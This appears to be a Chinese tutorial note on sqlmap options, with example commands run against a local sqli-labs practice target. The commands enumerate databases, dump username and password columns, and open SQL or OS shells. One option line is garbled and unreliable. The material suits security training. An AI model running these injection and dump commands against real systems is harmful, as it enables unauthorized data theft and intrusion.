某教程学习笔记(一):12、sqlmap使用介绍

简介: 某教程学习笔记(一):12、sqlmap使用介绍


一、环境:kali 2020.01,python2或python3

二、命令介绍

1、sqlmap --update 更新命令

2、is-dba 查询是否是管理员权限

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --is-dba

0a2653c851af460fa595bd959398a8f1.png

3、dbs 获取所有数据库名称

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --dbs

0eacb84100b54626af849e6b562bf92a.png

4、current-db 获取当前数据库名称

5、users 获取所有数据库用户

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --users

2d65d23f6d4748949b924e4057485923.png

6、current-users 获取当前数据库用户

7、tables 获取所有表的信息

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --tables -D security

2e9b90b2ca334476abebe75bafe6eeaa.png

8、columns 获取所有列的信息

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --columns -T users -D security

0a2653c851af460fa595bd959398a8f1.png

9、dump 获取字段内容

10、–level 指定扫描等级

11、D 指定数据库

12、T 指定表

13、C 指定列

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --dump -C “username,password” -T users -D security

0eacb84100b54626af849e6b562bf92a.png

14、dbms=mysql 指定数据库

15、v 显示调试信息

16、risk 显示风险等级

17、u 获取目标

18、m c:\1.txt 从文件总获取多个目标探测

19、data=“id=1” post方式注入

20、data=“su=123i d = 456 " − − p a r a m 0 d e l = " id=456" --param0del="id=456"−−param0del="” 分割参数

21、cookie cookie注入

22、referer 伪造http请求中的referer

23、headers 伪造http请求中的头部

24、proxy 添加代理,http://url:port

25、delay 设置两个请求间的延迟

26、timeout 设定请求超时时间

27、retries 设定重现链接次数

28、safe-url 提供一个连接,每隔一段时间就会去访问一下

29、safe-freq 提供一个连接,每次请求之后都会去访问一下

30、p “io=123” 指定参数进行探测注入

31、prefix 闭合语句的前面

32、suffix 闭合语句的后面

33、technique 指定探测方式

34、B:布尔型注入,E:报错型注入,U:联合查询注入,S:多语句查询注入,T:时间延迟注入

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --technique=U

2d65d23f6d4748949b924e4057485923.png

35、union-cols 指定联合查询的字段数

36、union-char 指定联合查询用到的字符

37、second-order 二阶注入后面跟跳转网址

38、search用来寻找特定的数据库名、表名、列名

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --search -T users

0a2653c851af460fa595bd959398a8f1.png

39、t “c:\1.txt” 把请求与相应的日志保存起来

40、batch 全自动按默认操作

41、charset=GBk 指定字符编码

42、flush-session 清空之前的session重新测试

43、hex 使用hex函数避免编码问题

44、smart 快速注入

45、mobile 设置成手机UA

45、identify-waf 监测用的什么waf

46、check-waf 监测是否存在waf

47、common-tables -D text 暴力破解表名(access)

48、common-columns -D text -T ttt 暴力破解列名

49、tamper base64encode.py base64编码注入

50、sql-query=“select version()” 执行sql语句

51、sql-shell 直接获取sql语句执行权限

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --sql-shell

0eacb84100b54626af849e6b562bf92a.png

52、file-read 读取文件


53、file-write 本地路劲 file-dest 上传文件

54、os-shell 获取shell权限

55、schema --exclude-sysdbs 列出除系统以外的数据库


禁止非法,后果自负


目录
相关文章
|
Python Windows
sqlmap安装及简介
sqlmap安装及简介
416 0
|
2月前
|
SQL 关系型数据库 MySQL
sqlmap进阶使用
sqlmap进阶使用
|
7月前
|
SQL 数据库 Python
sqlmap的安装及使用教程_sqlmap安装使用教程
sqlmap的安装及使用教程_sqlmap安装使用教程
sqlmap从入门到精通-第一章-1.2
sqlmap从入门到精通-第一章-1.2
|
7月前
|
安全 生物认证 数据库
2021Kali系列 -- Sqlmap基础操作
2021Kali系列 -- Sqlmap基础操作
78 0
|
关系型数据库 MySQL PHP
sqlmap从入门到精通-第一章-1.3
sqlmap从入门到精通-第一章-1.3
|
安全 Oracle 网络协议
Sqlmap手册—史上最全
Sqlmap手册—史上最全
353 0
|
SQL 安全 数据库
sqlmap的基本使用方法
sqlmap的基本使用方法
380 0
|
SQL 安全 关系型数据库
5.sqlmap 的基本使用
sqlmap是一款开源免费的漏洞检查、利用工具. 可以检测页面中get,post参数,cookie,http头等. 基本上可以说 安全从业人员必备的一款神器之软件.也是迈入安全圈的必要条件.
5.sqlmap 的基本使用
|
数据库